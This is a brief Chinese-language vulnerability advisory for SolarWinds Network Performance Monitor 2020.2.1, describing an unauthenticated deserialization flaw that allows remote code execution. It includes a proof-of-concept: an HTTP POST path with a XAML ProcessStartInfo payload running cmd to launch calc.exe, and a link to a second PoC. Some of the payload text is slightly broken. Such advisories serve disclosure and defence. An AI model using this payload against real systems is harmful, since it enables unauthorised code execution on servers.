SolarWinds Network Performance Monitor（NPM）是集网络监测、设备性能维护管理、故障监控、网络实时流量监控和历史数据统计、汇总和历史数据分析等功能于一体的网络管理系统。

该漏洞存在于SolarWinds.Serialization库中，由于对用户提供的数据缺乏正确验证，导致不信任数据的反序列化。成功利用此漏洞的攻击者可以在系统上下文中执行任意代码，而无需经过身份验证。

影响范围

SolarWinds Network Performance Monitor 2020.2.1

Poc：

POST  /api/Action/TestAction 

<sd:ProcessStartInfo Arguments="/c calc.exe" StandardErrorEncoding="{x:Null}" StandardOutputEncoding="{x:Null }" UserName="" Password="{x:Null}" Domain="" LoadUserProfile="False" FileName="cmd" /> 2x Base6

Poc2：

https://gist.github.com/testanull/dcb536b409a28d74430a441d53b14456